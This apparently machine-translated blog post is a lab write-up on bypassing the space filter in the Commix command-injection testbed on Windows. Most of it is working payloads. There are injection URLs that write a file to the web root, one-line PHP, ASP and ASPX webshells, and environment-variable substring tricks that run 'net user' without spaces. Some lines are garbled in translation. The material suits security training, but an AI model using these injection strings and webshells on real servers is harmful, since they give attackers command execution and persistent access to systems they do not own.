Hacking Book | Free Online Hacking Learning

 Home

the bypass test of the space filtering in the shooting range by the commix command

Posted by patinella at 2020-02-27
all

Operating system: Windows Server 2008 R2 x64 & windows 10 build 17134

Test environment: phpstudy (PHP / 5.6.27 + Apache / 2.4.23 + MySQL 5.5.53)

Check the source code of classic ﹣ non ﹣ space.php and find that it is filtered by regular expression matching spaces. Check whether there are spaces in our submitted get and post packets. If there are spaces, they will not be executed. If not, they will be executed.

Note: the author only tests and researches the space in windows. For Linux, see the reference link at the bottom.

(1) General execution mode

(2) Echo output (filter space)

(3) Echo output (bypass space)

https://github.com/3had0w/Blasting-Dictionary/blob/master/Commix%20-Space%EF%BC%8846%EF%BC%89.txt

(4) Echo write file (one sentence Trojan)

"Double quotes:

http://192.168.1.108/commix/scenarios/regular/GET/classic_non_space.php?addr=baidu.com%26echo="<?=phpinfo();?>">C:\phpStudy\WWW\commix\a.php

^Escape character:

Set / P variable:

Trojans without spaces:

PHP:

<[email protected]($_POST["90sec"]);?>

ASP:

<%execute(request("90sec"))%>

ASPX:

<%@Language="Jscript"%><%eval(Request.Item["90sec"],"unsafe");%>

Note: PHP allows the use of short tags <? =? > but is not encouraged. Short tags can only be used if you activate the short ﹣ open ﹣ tag configuration instruction in php.ini or if you use the configuration option -- enable short tags when compiling PHP. https://www.php.net/manual/zh/language.basic-syntax.phptags.php#122618

Metasploit PHP Payload:

The generated PHP payload has no PHP identifier by default, and you have to add it yourself! It also limits the execution of many commands and extensions, but we can still execute commands such as upload, download, execute, etc., and re upload and execute exe payload.

(5) Windows environment variable interception bypass

Principle of environment variable interception (from the analysis of brother destiny):

%%Take the environment variable, and then: intercept the string, ~ 10 starts from the first ten, 1 stands for 1 bit, and - 5 stands for the fifth from the bottom.

More environment variables with spaces can be viewed through the set command.

One problem:

Normal execution of CMD:

C:\>ping|net%path:~10,1%user>C:\net.txt

Echo of range is normal:

classic_non_space.php?addr=|echo=net%path:~10,1%user

Range execution output blank:

classic_non_space.php?addr=|net%path:~10,1%user>C:\net.txt

The range execution output is normal:

Note: the above problem may be the problem of my personal test environment. Two shooting ranges, commix testbed and DVWA, are tested on two machines respectively. The output of net user is blank file, but query user and other commands can be output normally. I found a few friends to help me with the test. They can output normally, but I can't execute net and Net1. I have been looking for information in the afternoon and asked many friends. I really don't understand what caused it. Finally, I can only give up the struggle and don't go further into the cause. Here is just a way of thinking for you. We should pay attention to the problem of authority in actual combat!

Temporary solutions:

1) echo=net user^>netuser.txt>C:\netuser.bat

3) http://192.168.1.108/commix/scenarios/regular/GET/netuser.txt

reference material:

https://github.com/commixproject/commix

https://www.betterhacker.com/2016/10/command-injection-without-spaces.html

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

"Please share more articles, thank you!"

© 2023